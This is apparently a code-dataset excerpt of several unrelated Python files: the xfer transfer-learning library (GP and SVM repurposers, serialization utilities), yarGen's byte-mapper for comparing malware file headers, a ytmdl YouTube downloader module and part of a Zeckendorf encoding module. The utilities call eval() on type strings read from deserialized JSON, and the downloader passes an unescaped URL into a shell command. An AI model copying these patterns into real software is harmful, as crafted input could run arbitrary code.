p = p.replace('\\','/')
ext = p.split(".")[-1]
f = open(p,'r').read()
g = globals()['min_'+ext](f)
h = to_cstr(g)
name = "TEXT_"+p.split("/")[-1].replace("/","_").replace("\\","_").replace(".","_")
out += "const char* "+name+" = "+h+";\n"
out += "\n#endif\n"
open("../src/text.c",'w').write(out)
``` |
{
"source": "0xflotus/xfer",
"score": 2
} |
#### File: xfer/xfer/gp_repurposer.py
```python
import mxnet as mx
import numpy as np
from sklearn.preprocessing import LabelBinarizer, Normalizer
from .meta_model_repurposer import MetaModelRepurposer
from .constants import gp_repurposer_keys as keys
from .constants import repurposer_keys
from . import utils
class GpRepurposer(MetaModelRepurposer):
"""
Repurpose source neural network to create a Gaussian Process (GP) meta-model through Transfer Learning.
:param source_model: Source neural network to do transfer learning from.
:type source_model: :class:`mxnet.mod.Module`
:param feature_layer_names: Name of layer(s) in source_model from which features should be transferred.
:type feature_layer_names: list[str]
:param context_function: MXNet context function that provides device type context.
:type context_function: function(int)->:class:`mx.context.Context`
:param int num_devices: Number of devices to use to extract features from source_model.
:param int max_function_evaluations: Maximum number of function evaluations to perform in GP optimization.
:param bool apply_l2_norm: Whether to apply L2 normalization after extracting features from source neural network.
If set to True, L2 normalization will be applied to features before passing to GP during
training and prediction.
"""
def __init__(self, source_model: mx.mod.Module, feature_layer_names, context_function=mx.context.cpu, num_devices=1,
max_function_evaluations=100, apply_l2_norm=False):
# Call base class constructor with parameters required for meta-models
super().__init__(source_model, feature_layer_names, context_function, num_devices)
self.max_function_evaluations = max_function_evaluations
self.apply_l2_norm = apply_l2_norm
# Mean of features to use for normalization. Computed in training phase.
# Used to normalize features in training and in prediction.
self.feature_mean = None
# Optimizer to use for training GP model
self.optimizer = 'lbfgs'
# Number of inducing points to use for sparse GP
self.NUM_INDUCING_SPARSE_GP = 100
# Normalizer to use when apply_l2_norm flag is set
self.l2_normalizer = Normalizer(norm='l2')
def _train_model_from_features(self, features, labels, feature_indices_per_layer):
"""
Train GP classification models using features extracted from the source neural network.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:param labels: Labels to use for training.
:type labels: :class:`numpy.ndarray`
:param feature_indices_per_layer: Mapping of feature_layer_names to dimension indices in features array
i.e. {layer_name, feature_indices}.
Used to build separate kernels for features from different layers.
:type feature_indices_per_layer: OrderedDict[str, :class:`numpy.ndarray`]
:return: List of GP classification models trained for each class (one-vs-all) in given training data.
List of Sparse GP models returned if number of training instances is greater than
NUM_INDUCING_SPARSE_GP.
If there are only two classes in training data, then the output list contains a single model.
:rtype: list[:class:`GPy.models.GPClassification`] or list[:class:`GPy.models.SparseGPClassification`]
"""
# Normalize features to train on
self.feature_mean = features.mean(axis=0) # Compute mean for each feature across all training instances
normalized_features = features - self.feature_mean # Normalize features to have zero mean
if self.apply_l2_norm: # Apply L2 normalization if flag is set
normalized_features = self.l2_normalizer.fit_transform(normalized_features)
# Binarize labels in a one-vs-all fashion to train a separate model for each class
# Output contains 'c' columns (c=number of classes) and each column contains binary labels w.r.t to that class.
# If number of classes is two, then the output contains a single column with values 0 and 1
binarized_labels = LabelBinarizer().fit_transform(labels)
# Build kernel using given feature indices
kernel = self._build_kernel(feature_indices_per_layer)
        # Do sparse GP if the number of training instances is greater than the chosen number of inducing points
# Otherwise, do normal GP classification because the data set is small
num_training_instances = features.shape[0]
do_sparse_gp = (num_training_instances > self.NUM_INDUCING_SPARSE_GP)
# Train a GP model for each class (one-vs-all) if there are more than two classes, and one model if there
# are only two classes
num_models = binarized_labels.shape[1]
models = [None] * num_models
for model_index in range(num_models):
binary_labels_for_current_class = binarized_labels[:, model_index:model_index+1]
input_kernel = kernel.copy() # Pass copy of kernel to avoid original kernel being updated by GPy
models[model_index] = self._train_model_for_binary_label(binary_label=binary_labels_for_current_class,
features=normalized_features,
kernel=input_kernel,
do_sparse_gp=do_sparse_gp)
return models
def _train_model_for_binary_label(self, features, binary_label, kernel, do_sparse_gp):
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
# Train a GPy model for binary classification with given features and kernel
if do_sparse_gp:
model = GPy.models.SparseGPClassification(X=features, Y=binary_label, kernel=kernel,
num_inducing=self.NUM_INDUCING_SPARSE_GP)
else:
model = GPy.models.GPClassification(X=features, Y=binary_label, kernel=kernel)
model.optimize(optimizer=self.optimizer, max_iters=self.max_function_evaluations)
return model
@staticmethod
def _build_kernel(feature_indices_per_layer):
"""
Build separate RBF kernels for features from different layers and return the kernel that results from adding all
feature specific kernels.
:param feature_indices_per_layer: Mapping of feature_layer_names to dimension indices in features array
i.e. {layer_name, feature_indices}.
:type feature_indices_per_layer: dict[str, :class:`numpy.ndarray`]
:return: GPy RBF kernel if all features are from single layer or GPy Add kernel if features are from multiple
layers.
:rtype: :class:`GPy.kern.RBF` or :class:`GPy.kern.Add`
"""
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
all_kernels = None
for layer_name in feature_indices_per_layer:
active_dims = feature_indices_per_layer[layer_name] # feature indices corresponding to current layer
kernel = GPy.kern.RBF(input_dim=active_dims.size, name=layer_name, active_dims=active_dims.tolist())
if all_kernels is None:
all_kernels = kernel
else:
all_kernels += kernel
return all_kernels
def _predict_probability_from_features(self, features):
"""
Compute predictions using self.target_model with features extracted from source neural network.
self.target_model is a list of GP classification models trained for each class in a one-vs-all fashion.
Use GPy's predict method on each model and compute probabilities predicted for individual classes.
The individual class probabilities are then normalized such that their sum is 1.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Normalized one-vs-all probabilities.
:rtype: :class:`numpy.ndarray`
"""
normalized_features = features - self.feature_mean # Normalize features using the training features' means
if self.apply_l2_norm: # Apply L2 normalization if flag is set
normalized_features = self.l2_normalizer.transform(normalized_features)
num_gp_models = len(self.target_model)
if num_gp_models == 1:
# When there are only two classes, get probability for class_1 (P) and calculate probability for class_0
# (1-P)
prediction, _ = self.target_model[0].predict(normalized_features)
normalized_predictions = np.hstack([1.0-prediction, prediction])
else:
# When there are more than two classes, get one-vs-all prediction scores for each class
# from binary GP models
predictions_per_class = []
for model_id in range(num_gp_models):
binary_gp_model = self.target_model[model_id]
binary_prediction, _ = binary_gp_model.predict(normalized_features)
predictions_per_class.append(binary_prediction)
# Convert scores list to numpy array
predictions = np.nan_to_num(np.hstack(predictions_per_class))
# Normalize individual predictions to sum up to 1
sum_of_predictions_per_instance = np.sum(predictions, axis=1).reshape(predictions.shape[0], 1)
normalized_predictions = predictions / sum_of_predictions_per_instance
return normalized_predictions
def _predict_label_from_features(self, features):
"""
Return labels predicted using target_model with features extracted from source neural network.
target_model is a list of GP classification models trained for each class in a one-vs-all fashion.
Using GPy's predict method, compute one-vs-all probabilities per class and return the class with
maximum probability.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted labels i.e. Class with maximum probability for each test instance.
:rtype: :class:`numpy.ndarray`
"""
predictions = self._predict_probability_from_features(features)
labels = np.argmax(predictions, axis=1) # Select label with maximum prediction for each test instance
return labels
def get_params(self):
"""
Get parameters of repurposer that are in the constructor's argument list.
:rtype: dict
"""
params_dict = super().get_params()
params_dict[keys.MAX_FUNCTION_EVALUATIONS] = self.max_function_evaluations
params_dict[keys.APPLY_L2_NORM] = self.apply_l2_norm
return params_dict
def _get_attributes(self):
"""
Get parameters of repurposer not in constructor's argument list.
:rtype: dict
"""
attributes_dict = super()._get_attributes()
attributes_dict[keys.OPTIMIZER] = self.optimizer
attributes_dict[keys.NUM_INDUCING_SPARSE_GP] = self.NUM_INDUCING_SPARSE_GP
attributes_dict[keys.FEATURE_MEAN] = self.feature_mean.tolist()
return attributes_dict
def _set_attributes(self, input_dict):
"""
Set attributes of class from input_dict.
These attributes are the same as those returned by get_attributes method.
:param input_dict: Dictionary containing attribute values.
:return: None
"""
super()._set_attributes(input_dict)
self.optimizer = input_dict[keys.OPTIMIZER]
self.NUM_INDUCING_SPARSE_GP = input_dict[keys.NUM_INDUCING_SPARSE_GP]
self.feature_mean = np.array(input_dict[keys.FEATURE_MEAN])
def serialize(self, file_prefix):
"""
Serialize the GP repurposer (model and supporting info) and save to file.
:param str file_prefix: Prefix of file path to save the serialized repurposer to.
:return: None
"""
# Get constructor params. This will be used to recreate repurposer object in deserialization flow.
output_dict = {repurposer_keys.PARAMS: self.get_params()}
# Get rest of the attributes to save with the repurposer.
output_dict.update(self._get_attributes())
# Serialize the GP models and save to output dictionary
output_dict[repurposer_keys.TARGET_MODEL] = self._serialize_target_gp_models(save_data=True)
# Save the serialized params and attributes to file
utils.save_json(file_prefix, output_dict)
def deserialize(self, input_dict):
"""
Uses dictionary to set attributes of repurposer.
:param dict input_dict: Dictionary containing values for attributes to be set to.
:return: None
"""
# Set attributes of the repurposer from input_dict
self._set_attributes(input_dict)
# Deserialize and set the target GP models
self.target_model = self._deserialize_target_gp_models(input_dict[repurposer_keys.TARGET_MODEL])
def _serialize_target_gp_models(self, save_data=True):
# Serialize the gp models trained per class and add to output list
serialized_models = []
for model in self.target_model:
serialized_models.append(model.to_dict(save_data=save_data))
return serialized_models
@staticmethod
def _deserialize_target_gp_models(serialized_target_model):
# GPy is imported here in order to avoid importing it during 'import xfer'
import GPy
# Deserialize the GP models trained per class and return
deserialized_models = []
for model_dict in serialized_target_model:
deserialized_models.append(GPy.core.Model.from_dict(model_dict))
return deserialized_models
```
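A minimal usage sketch, under two assumptions: that the package re-exports `GpRepurposer` at the top level, and that the `MetaModelRepurposer` base class (not shown in this excerpt) provides the usual `repurpose()`/`predict_label()` driver methods. `source_model`, `train_iterator` and `test_iterator` are placeholders.
```python
from xfer import GpRepurposer   # assumes the package exposes the class at top level

# source_model is a pre-trained mx.mod.Module; the iterators are MXNet data iterators.
repurposer = GpRepurposer(source_model, feature_layer_names=['fc1'], apply_l2_norm=True)
repurposer.repurpose(train_iterator)              # extract features and fit one GP per class
labels = repurposer.predict_label(test_iterator)  # argmax of the normalized one-vs-all probabilities
```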
#### File: xfer/prob/obs.py
```python
import mxnet.ndarray as nd
from .prob_base import Probability
class Likelihood(Probability):
def __init__(self, ctx):
super(Likelihood, self).__init__(None, ctx)
class Categorical(Likelihood):
def __init__(self, ctx):
super(Categorical, self).__init__(ctx)
def set_unnormalized_mean(self, unnormalized_mean):
self.unnormalized_mean = unnormalized_mean
def log_pdf(self, y):
return nd.sum(nd.nansum(y * nd.log_softmax(self.unnormalized_mean), axis=0, exclude=True))
```
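A small sketch of how the `Categorical` likelihood is driven. The tensor values are invented, it assumes `Categorical` from the module above is in scope, and it relies on the unseen `Probability` base class accepting the `(None, ctx)` arguments it is called with here.
```python
import mxnet as mx
import mxnet.ndarray as nd

lik = Categorical(ctx=mx.cpu())
scores = nd.array([[2.0, 0.5, -1.0]])   # unnormalized class scores for one sample
onehot = nd.array([[1.0, 0.0, 0.0]])    # one-hot target
lik.set_unnormalized_mean(scores)
print(lik.log_pdf(onehot))              # log-softmax probability of the true class
```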
#### File: xfer/xfer/svm_repurposer.py
```python
import mxnet as mx
from sklearn.svm import SVC
from .meta_model_repurposer import MetaModelRepurposer
from .constants import repurposer_keys
from .constants import meta_model_repurposer_keys as keys
from . import utils
class SvmRepurposer(MetaModelRepurposer):
"""
Perform Transfer Learning through a Support Vector Machine (SVM) meta-model which repurposes the source neural
network.
:param source_model: Source neural network to do transfer learning from.
:type source_model: :class:`mxnet.mod.Module`
:param feature_layer_names: Name of layer(s) in source_model from which features should be transferred.
:type feature_layer_names: list[str]
:param context_function: MXNet context function that provides device type context.
:type context_function: function(int)->:class:`mx.context.Context`
:param int num_devices: Number of devices to use to extract features from source_model.
:param float c: Penalty parameter C of the error term.
:param string kernel: Specifies the kernel type to be used in the SVM algorithm in sklearn library. It must
be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or a callable.
:param float gamma: Kernel coefficient for 'rbf', 'poly' and 'sigmoid'. If gamma is 'auto' then 1/n_features will
be used instead.
:param bool enable_probability_estimates: Whether to enable probability estimates.
This must be enabled for predict_probability to work and will slow down
training.
"""
def __init__(self, source_model: mx.mod.Module, feature_layer_names, context_function=mx.cpu, num_devices=1,
c=1.0, kernel='linear', gamma='auto', enable_probability_estimates=False):
# Call base class constructor with parameters required for meta-models
super(SvmRepurposer, self).__init__(source_model, feature_layer_names, context_function, num_devices)
# Initialize SVM specific parameters
self.c = c
self.kernel = kernel
self.gamma = gamma
self.enable_probability_estimates = enable_probability_estimates
def get_params(self):
"""
Get parameters of repurposer that are in the constructor.
:rtype: dict
"""
param_dict = super(SvmRepurposer, self).get_params()
param_dict[keys.C] = self.c
param_dict[keys.KERNEL] = self.kernel
param_dict[keys.GAMMA] = self.gamma
param_dict[keys.PROB_ESTIMATES] = self.enable_probability_estimates
return param_dict
def _train_model_from_features(self, features, labels, feature_indices_per_layer=None):
"""
Train an SVM model using features extracted from source neural network.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:param labels: Labels to use for training.
:type labels: :class:`numpy.ndarray`
:param feature_indices_per_layer: Mapping of feature_layer_names to indices in features array
i.e. {layer_name, feature_indices} Note that this param is currently not
consumed by svm_repurposer.
:type feature_indices_per_layer: OrderedDict[str, :class:`numpy.ndarray`]
:return: SVM model trained with given features and labels using sci-kit learn library.
:rtype: :class: `sklearn.svm.SVC`
"""
svm_classifier = SVC(C=self.c,
kernel=self.kernel,
gamma=self.gamma,
decision_function_shape='ovr',
random_state=1,
probability=self.enable_probability_estimates)
svm_classifier.fit(features, labels)
return svm_classifier
def _predict_probability_from_features(self, features):
"""
Run predictions with target_model on features extracted from source neural network.
Use sklearn's SVM predict_proba method and return predicted probabilities.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted probabilities.
:rtype: :class:`numpy.ndarray`
"""
if not self.target_model.probability:
raise ValueError("Probability estimates should have been enabled during model training for this method to \
work")
return self.target_model.predict_proba(features)
def _predict_label_from_features(self, features):
"""
Run predictions with target_model on features extracted from source neural network.
Use sklearn's SVM predict method and return predicted labels.
:param features: Features extracted from source neural network.
:type features: :class:`numpy.ndarray`
:return: Predicted labels.
:rtype: :class:`numpy.ndarray`
"""
return self.target_model.predict(features)
def serialize(self, file_prefix):
"""
Saves repurposer (excluding source model) to file_prefix.json.
:param str file_prefix: Prefix to save file with.
"""
output_dict = {}
output_dict[repurposer_keys.PARAMS] = self.get_params()
output_dict[repurposer_keys.TARGET_MODEL] = utils.sklearn_model_to_dict(self.target_model)
output_dict.update(self._get_attributes())
utils.save_json(file_prefix, output_dict)
def deserialize(self, input_dict):
"""
Uses dictionary to set attributes of repurposer.
:param dict input_dict: Dictionary containing values for attributes to be set to.
"""
self._set_attributes(input_dict) # Set attributes of the repurposer from input_dict
self.target_model = utils.sklearn_model_from_dict(SVC, input_dict[repurposer_keys.TARGET_MODEL])
```
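A sketch of the save/restore round trip implied by `serialize()`/`deserialize()`. The `.json` suffix is an assumption based on `utils.save_json()`, and `svm_repurposer`/`source_model` are placeholders for objects created earlier.
```python
import json

svm_repurposer.serialize('my_svm_repurposer')        # assumed to write my_svm_repurposer.json

with open('my_svm_repurposer.json') as fp:
    saved = json.load(fp)

restored = SvmRepurposer(source_model, feature_layer_names=['fc1'])  # same constructor args as before
restored.deserialize(saved)                           # rebuilds the sklearn SVC meta-model
```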
#### File: xfer/xfer/utils.py
```python
import numpy as np
import os
import mxnet as mx
import json
from .constants import serialization_constants as consts
from .constants import repurposer_keys as keys
def sklearn_model_to_dict(target_model):
output_dict = {}
import copy
# model_dict contains all attributes of model
model_dict = copy.deepcopy(target_model.__dict__)
for k in model_dict:
# Replace any numpy array with [data_type_as_str, array_as_list]
# e.g np.array([1,2]) -> ['int', [1,2]]
if isinstance(model_dict[k], np.ndarray):
type_data = str(model_dict[k].dtype)
model_dict[k] = [type_data, model_dict[k].tolist()]
# Replace any tuple with ['tuple', tuple_as_list]
# e.g (1,2) -> ['tuple', [1,2]]
if isinstance(model_dict[k], tuple):
model_dict[k] = [keys.TUPLE, list(model_dict[k])]
output_dict[keys.MODEL] = {}
# Model params are public attributes
output_dict[keys.MODEL][keys.PARAMS] = target_model.get_params()
# Serialise all private attributes
output_dict[keys.MODEL][keys.ATTRS] = {}
for k in model_dict:
# Serialize private parameters as attributes
if k[-1] == '_' or k[0] == '_':
output_dict[keys.MODEL][keys.ATTRS][k] = model_dict[k]
return output_dict
def sklearn_model_from_dict(model_class, input_dict):
# Initialize model with serialized model parameters
model = model_class(**input_dict[keys.MODEL][keys.PARAMS])
# Set model attributes
for k in input_dict[keys.MODEL][keys.ATTRS]:
# Unpack tuples and np.arrays that were serialised as lists
if isinstance(input_dict[keys.MODEL][keys.ATTRS][k], list) \
and isinstance(input_dict[keys.MODEL][keys.ATTRS][k][0], str) \
and type(input_dict[keys.MODEL][keys.ATTRS][k][1]) == list:
if input_dict[keys.MODEL][keys.ATTRS][k][0] == keys.TUPLE:
setattr(model, k, tuple(input_dict[keys.MODEL][keys.ATTRS][k][1]))
else:
type_data = 'np.' + input_dict[keys.MODEL][keys.ATTRS][k][0]
type_data = eval(type_data)
setattr(model, k, np.array(input_dict[keys.MODEL][keys.ATTRS][k][1], dtype=type_data))
else:
setattr(model, k, input_dict[keys.MODEL][keys.ATTRS][k])
return model
def _assert_repurposer_file_exists(repurposer_file_list):
for file_name in repurposer_file_list:
if not os.path.isfile(file_name):
raise NameError('Cannot find repurposer file ({})'.format(file_name))
def save_mxnet_model(model, file_path_prefix, epoch, provide_data=None, provide_label=None):
if not model.binded:
if provide_data is None or provide_label is None:
raise ValueError("provide_data and provide_label are required because mxnet module is not binded")
model.bind(data_shapes=provide_data, label_shapes=provide_label)
model.save_checkpoint(file_path_prefix, epoch)
def save_json(file_prefix, output_dict):
with open(file_prefix + consts.JSON_SUFFIX, mode='w') as fp:
json.dump(obj=output_dict, fp=fp)
def serialize_ctx_fn(context_function):
if context_function == mx.cpu:
return keys.CPU
elif context_function == mx.gpu:
return keys.GPU
else:
raise ValueError('Unexpected context function {}'.format(context_function))
def deserialize_ctx_fn(context_function):
if context_function == keys.CPU:
return mx.cpu
elif context_function == keys.GPU:
return mx.gpu
else:
raise ValueError('Unexpected context function {}'.format(context_function))
``` |
{
"source": "0xflotus/yarGen",
"score": 2
} |
#### File: yarGen/tools/byte-mapper.py
```python
import os
import sys
import argparse
import re
import traceback
from colorama import Fore, Back, Style
from colorama import init
from hashlib import md5
def getFiles(dir, recursive):
# Recursive
if recursive:
for root, directories, files in os.walk (dir, followlinks=False):
for filename in files:
filePath = os.path.join(root,filename)
yield filePath
# Non recursive
else:
for filename in os.listdir(dir):
filePath = os.path.join(dir,filename)
yield filePath
def parseDir(dir, recursive, numBytes):
# Prepare dictionary
byte_stats = {}
fileCount = 0
for filePath in getFiles(dir, recursive):
if os.path.isdir(filePath):
if recursive:
parseDir(dir, recursive, numBytes)
continue
with open(filePath, 'r') as file:
fileCount += 1
header = file.read(int(numBytes))
pos = 0
for byte in header:
pos += 1
if pos in byte_stats:
if byte in byte_stats[pos]:
byte_stats[pos][byte] += 1
else:
byte_stats[pos][byte] = 1
else:
#byte_stats.append(pos)
byte_stats[pos] = { byte: 1 }
return byte_stats, fileCount
def visiualizeStats(byteStats, fileCount, heatMapMode, byteFiller, bytesPerLine):
# Settings
# print fileCount
bytesPrinted = 0
for byteStat in byteStats:
if args.d:
print "------------------------"
print byteStats[byteStat]
byteToPrint = ".."
countOfByte = 0
highestValue = 0
        # Evaluate the most frequently occurring byte value at this position
for ( key, val ) in byteStats[byteStat].iteritems():
if val > highestValue:
highestValue = val
byteToPrint = key
countOfByte = val
# Heat Map Mode
if heatMapMode:
printHeatMapValue(byteToPrint, countOfByte, fileCount, byteFiller)
# Standard Mode
else:
if countOfByte >= fileCount:
sys.stdout.write("%s%s" % ( byteToPrint.encode('hex'), byteFiller ))
else:
sys.stdout.write("..%s" % byteFiller)
# Line break
bytesPrinted += 1
if bytesPrinted >= bytesPerLine:
sys.stdout.write("\n")
bytesPrinted = 0
# Print Heat Map Legend
printHeatLegend(int(fileCount))
def printHeatMapValue(byteToPrint, countOfByte, fileCount, byteFiller):
if args.d:
print "Count of byte: %s" % countOfByte
print "File Count: %s" % fileCount
if countOfByte == fileCount:
sys.stdout.write(Fore.GREEN + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 1:
sys.stdout.write(Fore.CYAN + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 2:
sys.stdout.write(Fore.YELLOW + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 3:
sys.stdout.write(Fore.RED + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 4:
sys.stdout.write(Fore.MAGENTA + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
elif countOfByte == fileCount - 5:
sys.stdout.write(Fore.WHITE + '%s' % byteToPrint.encode('hex') + Fore.WHITE + '%s' % byteFiller)
else:
sys.stdout.write(Fore.WHITE + Style.DIM + '..' + Fore.WHITE + Style.RESET_ALL + '%s' % byteFiller)
def printHeatLegend(fileCount):
print ""
print Fore.GREEN + 'GREEN\tContent of all %s files' % str(fileCount) + Fore.WHITE
if fileCount > 1:
print Fore.CYAN + 'CYAN\tContent of %s files' % str(fileCount-1) + Fore.WHITE
if fileCount > 2:
print Fore.YELLOW + 'YELLOW\tContent of %s files' % str(fileCount-2) + Fore.WHITE
if fileCount > 3:
print Fore.RED + 'RED\tContent of %s files' % str(fileCount-3) + Fore.WHITE
if fileCount > 4:
print Fore.MAGENTA + 'MAGENTA\tContent of %s files' % str(fileCount-4) + Fore.WHITE
if fileCount > 5:
print Fore.WHITE + 'WHITE\tContent of %s files' % str(fileCount-5) + Fore.WHITE
if fileCount > 6:
print Fore.WHITE + Style.DIM +'..\tNo identical bytes in more than %s files' % str(fileCount-6) + Fore.WHITE + Style.RESET_ALL
# MAIN ################################################################
if __name__ == '__main__':
# Parse Arguments
parser = argparse.ArgumentParser(description='Yara BSG')
parser.add_argument('-p', metavar="malware-dir", help='Path to scan for malware')
parser.add_argument('-r', action='store_true', default=False, help='Be recursive')
parser.add_argument('-m', action='store_true', default=False, help='Heat map on byte values')
parser.add_argument('-f', default=" ", metavar="byte-filler", help='character to fill the gap between the bytes (default: \' \')')
parser.add_argument('-c', default=None, metavar="num-occurances", help='Print only bytes that occur in at least X of the samples (default: all files; incompatible with heat map mode) ')
parser.add_argument('-b', default=1024, metavar="bytes", help='Number of bytes to print (default: 1024)')
parser.add_argument('-l', default=16, metavar="bytes-per-line", help='Number of bytes to print per line (default: 16)')
parser.add_argument('-d', action='store_true', default=False, help='Debug Info')
args = parser.parse_args()
# Colorization
init()
# Parse the Files
( byteStats, fileCount) = parseDir(args.p, args.r, args.b)
# print byteStats
if args.c != None and not args.m:
fileCount = int(args.c)
# Vizualize Byte Stats
visiualizeStats(byteStats, fileCount, args.m, args.f, args.l)
``` |
{
"source": "0xflotus/ytmdl",
"score": 3
} |
#### File: ytmdl/ytmdl/yt.py
```python
import requests
from bs4 import BeautifulSoup
import os
import youtube_dl
import re
from ytmdl import defaults, utility
from downloader_cli.download import Download
import traceback
from ytmdl.logger import Logger
logger = Logger("yt")
def get_youtube_streams(url):
"""Get both audio & vidoe stream urls for youtube using youtube-dl.
PS: I don't know how youtube-dl does the magic
"""
cli = "youtube-dl -g {}".format(url)
output, error = utility.exe(cli)
stream_urls = output.split("\n")
url = stream_urls[1]
return url
def GRAB_SONG(link):
"""Return true if the song is downloaded else false."""
ydl_opts = {
'format': 'bestaudio',
'quiet': True,
'outtmpl': os.path.join(defaults.DEFAULT.SONG_TEMP_DIR,
'%(title)s.%(ext)s'),
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': defaults.DEFAULT.SONG_QUALITY
}]
}
# Download the song with youtube-dl
try:
ydl = youtube_dl.YoutubeDL(ydl_opts)
ydl.download([link])
return True
except TimeoutError:
print('Timed Out! Are you connected to internet?\a')
return False
else:
return False
def dw(value, song_name='ytmdl_temp.mp3'):
"""Download the song."""
try:
# Get the audio stream link
url = get_youtube_streams(value)
# If song_name doesnt have mp3 extension, add it
if not song_name.endswith('.mp3'):
song_name += '.mp3'
# Replace the spaces with hashes
song_name = song_name.replace(' ', '#')
song_name = song_name.replace('/', '#')
# The directory where we will download to.
dw_dir = defaults.DEFAULT.SONG_TEMP_DIR
logger.info("Saving the files to: {}".format(dw_dir))
if not os.path.exists(dw_dir):
os.makedirs(dw_dir)
# Name of the temp file
name = os.path.join(dw_dir, song_name)
# Start downloading the song
Download(url, name).download()
return name
except Exception as e:
traceback.print_exception(e)
return e
def get_href(url):
"""Get the watch? part of the url in case of urls."""
pos_watch = url.index('/watch?v=')
part = url[pos_watch:]
return part
def search(querry, bettersearch, kw=[], lim=10):
"""Search the querry in youtube and return lim number of results.
Querry is the keyword, i:e name of the song
lim is the number of songs that will be added to video array and returned
"""
# Add keywords if better search is enabled
if bettersearch:
for keyword in kw:
if keyword is not None:
querry += ' ' + keyword
# Replace all the spaces with +
querry = querry.replace(' ', '+')
url = "https://www.youtube.com/results?search_query={}".format(querry)
response = requests.get(url)
soup = BeautifulSoup(response.text, "lxml")
videos = soup.findAll('div', attrs={'class': 'yt-lockup-content'})
if not videos:
return []
if len(videos) > lim:
videos = videos[:lim]
extracted_data = []
for video in videos:
a = video.find_all('a')
data = {}
data['title'] = a[0]['title']
data['href'] = a[0]['href']
data['author_name'] = a[1].text
duration_unprocessed = video.span.text
duration = re.sub(r'\ |\-|\.|Duration', '', duration_unprocessed)
data['duration'] = re.subn(r':', '', duration, 1)[0]
extracted_data.append(data)
return extracted_data
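# Illustrative shape of the return value (values invented):
#     [{'title': 'Some Song', 'href': '/watch?v=abc123',
#       'author_name': 'Some Channel', 'duration': '3:45'}, ...]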
def scan_video(url):
"""Scan the link of the video and return data and."""
try:
search_tmplt = "http://www.youtube.com/oembed?url={}&format=json"
search_url = search_tmplt.format(url)
r = requests.get(search_url)
if r.status_code == 200:
return r.json()
else:
return "Unauthorized"
except Exception:
return False
if __name__ == '__main__':
print(defaults.DEFAULT.SONG_QUALITY)
``` |
{
"source": "0xflotus/zeckendorf-1",
"score": 4
} |
#### File: zeckendorf-1/zeckendorf/binary.py
```python
from zeckendorf.base import _fibs, _negafibs, negazeck, zeck
def _ordered_in(contained, container):
"""
A version of (item in container for item in contained) for the case
where container is an iterable whose items appear in the same order
as they do in contained.
:param contained: an iterable of values that would go on the left
side of the "in" operator.
:param container: an iterable that would go on the right side of
the "in" operator. Doesn't have to be a container.
:type contained: Iterable
:type container: Iterable
:return: an iterator of True and False values.
:rtype: Iterator[bool]
"""
for item in container:
for nxt in contained:
if nxt == item:
yield True
break
yield False
def fromiter(iterable):
"""
Construct a binary number from a finite iterable, where the ith bit
from the right is the truth value of the iterable's ith item.
:param iterable: any iterable, usually one with boolean values.
:type iterable: Iterable
:return: the binary number.
:rtype: int
"""
return sum(1 << i for i, obj in enumerate(iterable) if obj)
def fromzeck(zeck, nega=False):
"""
Construct a binary number from a finite stream of Fibonacci numbers,
where the ith bit from the right is 1 if and only if the (i + 2)th
Fibonacci number appears in the stream.
:param zeck: a stream of Fibonacci numbers ordered from largest to
smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the right
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the binary number.
:rtype: int
"""
if nega:
fibs = _negafibs()
next(fibs) # ignore 0 and start with 1, -1, 2, ...
else:
fibs = _fibs()
next(fibs), next(fibs) # ignore 0, 1 and start with 1, 2, ...
return fromiter(_ordered_in(fibs, reversed(tuple(zeck))))
def str_fromzeck(zeck, nega=False):
"""
Construct a string of bits from a finite stream of Fibonacci
numbers, where the ith bit from the right is 1 if and only if the
(i + 2)th Fibonacci number appears in the stream.
:param zeck: a stream of Fibonacci numbers ordered from largest to
smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the right
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the string of bits.
:rtype: str
"""
return f'{fromzeck(zeck, nega=nega):b}'
def fibcode_fromzeck(zeck, nega=False):
"""
Construct a Fibonacci code word for a particular Zeckendorf
representation.
A Fibonacci code word is the bitstring of a Zeckendorf
representation, but reversed and with an extra "1" on the end. The
Fibonacci code is a variable-length Huffman code where "11" appears
at the end of a word and nowhere else.
:param zeck: a stream of Fibonacci numbers ordered from largest to
smallest, usually one generated by zeckendorf.base.zeck().
:param nega: whether to take in nega-Fibonacci numbers, such as may
be generated by zeckendorf.base.negazeck(), instead of regular
ones. If so, there will be an extra bit on the left
corresponding to the lone 1 in the nega-Fibonacci sequence.
:type zeck: Iterable[int]
:type nega: bool
:return: the Fibonacci code word.
:rtype: str
"""
return f'{str_fromzeck(zeck, nega=nega)[::-1]}1'
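# Worked example (not in the original module): 11 = 8 + 3, so zeck(11) yields
# (8, 3). The bitstring is '10100' (bits set for F_6 = 8 and F_4 = 3); reversing
# it gives '00101', and appending '1' yields the Fibonacci code word '001011'.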
def fromint(n, nega=False):
"""
Construct a binary number from the Zeckendorf representation of n.
:param n: an integer.
:param nega: whether to use the nega-Zeckendorf representation in
lieu of the regular one. Negative values of n are only allowed
in this case.
:type n: int
:type nega: bool
:return: the binary number.
:rtype: int
"""
